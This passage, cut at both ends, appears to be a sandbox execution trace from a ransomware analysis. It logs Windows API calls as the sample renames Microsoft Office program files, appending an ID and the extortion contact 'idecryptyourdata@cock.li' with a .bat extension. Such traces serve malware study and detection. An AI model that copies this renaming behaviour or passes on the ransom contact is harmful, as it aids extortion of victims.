(normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.701] CloseHandle (hObject=0x42c) returned 1 [0167.701] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.702] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.702] CloseHandle (hObject=0x42c) returned 1 [0167.703] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.703] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.703] CloseHandle (hObject=0x42c) returned 1 [0167.704] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.704] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PROPRPT.VSSX.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\proprpt.vssx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.704] CloseHandle (hObject=0x42c) returned 1 [0167.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUB6INTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pub6intl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUB6INTL.DLL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pub6intl.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.707] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.707] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBCOLOR.SCM.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubcolor.scm.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.707] CloseHandle (hObject=0x42c) returned 1 [0167.709] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.710] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SAVASWEB.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\savasweb.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.710] CloseHandle (hObject=0x42c) returned 1 [0167.710] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.710] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.711] CloseHandle (hObject=0x42c) returned 1 [0167.711] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.711] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.711] CloseHandle (hObject=0x42c) returned 1 [0167.712] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.712] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.712] CloseHandle (hObject=0x42c) returned 1 [0167.722] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.722] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.722] CloseHandle (hObject=0x42c) returned 1 [0167.723] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.723] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.723] CloseHandle (hObject=0x42c) returned 1 [0167.725] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.725] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SHAPNUM.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\shapnum.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.725] CloseHandle (hObject=0x42c) returned 1 [0167.726] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.726] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.726] CloseHandle (hObject=0x42c) returned 1 [0167.727] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.727] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.727] CloseHandle (hObject=0x42c) returned 1 [0167.728] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.728] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.728] CloseHandle (hObject=0x42c) returned 1 [0167.728] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.728] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.919] CloseHandle (hObject=0x42c) returned 1 [0168.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\DocumentFormat.OpenXml.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\documentformat.openxml.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\DocumentFormat.OpenXml.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\documentformat.openxml.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0171.084] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.085] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSSPC.ECF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msspc.ecf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.085] CloseHandle (hObject=0x434) returned 1 [0171.086] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.086] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX.ECF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex.ecf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.087] CloseHandle (hObject=0x434) returned 1 [0171.087] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.087] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX2.ECF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex2.ecf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.087] CloseHandle (hObject=0x434) returned 1 [0171.088] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.088] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PMAILEXT.ECF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\pmailext.ecf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.089] CloseHandle (hObject=0x434) returned 1 [0171.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\microsoft.data.recommendation.client.core.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\MICROSOFT.DATA.RECOMMENDATION.CLIENT.CORE.DLL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\microsoft.data.recommendation.client.core.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0171.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\VISUALIZATIONCONTROL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\visualizationcontrol.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power Map Excel Add-in\\VISUALIZATIONCONTROL.DLL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power map excel add-in\\visualizationcontrol.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0172.924] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.924] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\PowerViewRes.hi.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\powerviewres.hi.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.924] CloseHandle (hObject=0x484) returned 1 [0172.938] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.938] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hr\\PowerViewRes.hr.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hr\\powerviewres.hr.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.938] CloseHandle (hObject=0x484) returned 1 [0172.945] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.945] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hu\\PowerViewRes.hu.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hu\\powerviewres.hu.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.945] CloseHandle (hObject=0x484) returned 1 [0172.953] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.953] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\PowerViewRes.id.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\powerviewres.id.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.953] CloseHandle (hObject=0x484) returned 1 [0172.958] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.958] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\PowerViewRes.it.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\powerviewres.it.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.959] CloseHandle (hObject=0x484) returned 1 [0173.174] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.174] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\PowerViewRes.lv.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\powerviewres.lv.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.175] CloseHandle (hObject=0x438) returned 1 [0173.176] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reporting.adhoc.shell.bootstrapper.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reporting.adhoc.shell.bootstrapper.xap.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0173.822] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.822] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-cyrl\\PowerViewRes.sr-cyrl.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-cyrl\\powerviewres.sr-cyrl.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.823] CloseHandle (hObject=0x52c) returned 1 [0173.836] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.836] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\PowerViewRes.sr-latn.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\powerviewres.sr-latn.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.837] CloseHandle (hObject=0x52c) returned 1 [0173.846] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.846] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\PowerViewRes.sr-Latn-CS.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel 